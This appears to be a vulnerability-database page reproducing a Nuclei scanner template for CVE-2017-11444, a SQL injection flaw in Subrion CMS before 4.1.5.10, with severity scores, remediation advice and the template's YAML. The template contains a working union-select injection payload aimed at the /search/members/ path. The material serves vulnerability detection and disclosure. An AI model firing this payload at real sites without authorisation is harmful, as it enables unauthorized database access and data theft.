Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-11444
HistorySep 26, 2020 - 1:05 a.m.

Subrion CMS <4.1.5.10 - SQL Injection

2020-09-2601:05:00
ProjectDiscovery
github.com
11

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.017 Low

EPSS

Percentile

87.7%

“Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array.”

id: CVE-2017-11444

info:
  name: Subrion CMS <4.1.5.10 - SQL Injection
  author: dwisiswant0
  severity: critical
  description: "Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array."
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: |
    Upgrade Subrion CMS to version 4.1.5.10 or later to mitigate this vulnerability.
  reference:
    - https://github.com/intelliants/subrion/issues/479
    - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q
    - https://nvd.nist.gov/vuln/detail/CVE-2017-11444
    - https://github.com/d4n-sec/d4n-sec.github.io
    - https://github.com/qazbnm456/awesome-cve-poc
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-11444
    cwe-id: CWE-89
    epss-score: 0.018
    epss-percentile: 0.88111
    cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: intelliants
    product: subrion_cms
  tags: cve2017,cve,sqli,subrion,intelliants
variables:
  string: "{{to_lower(rand_base(5))}}"
  hex_string: "{{hex_encode(string)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%27{{hex_string}}%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{string}}'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b2343cc25b19e1ca3bd71b44003198237cb5901c4d7ebc10cf40e0e9b49fd6bf02203ea67091fb55c946949988fcfc0c892ed7166c3f42c21f180e21804e89046e75:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.017 Low

EPSS

Percentile

87.7%

Related for NUCLEI:CVE-2017-11444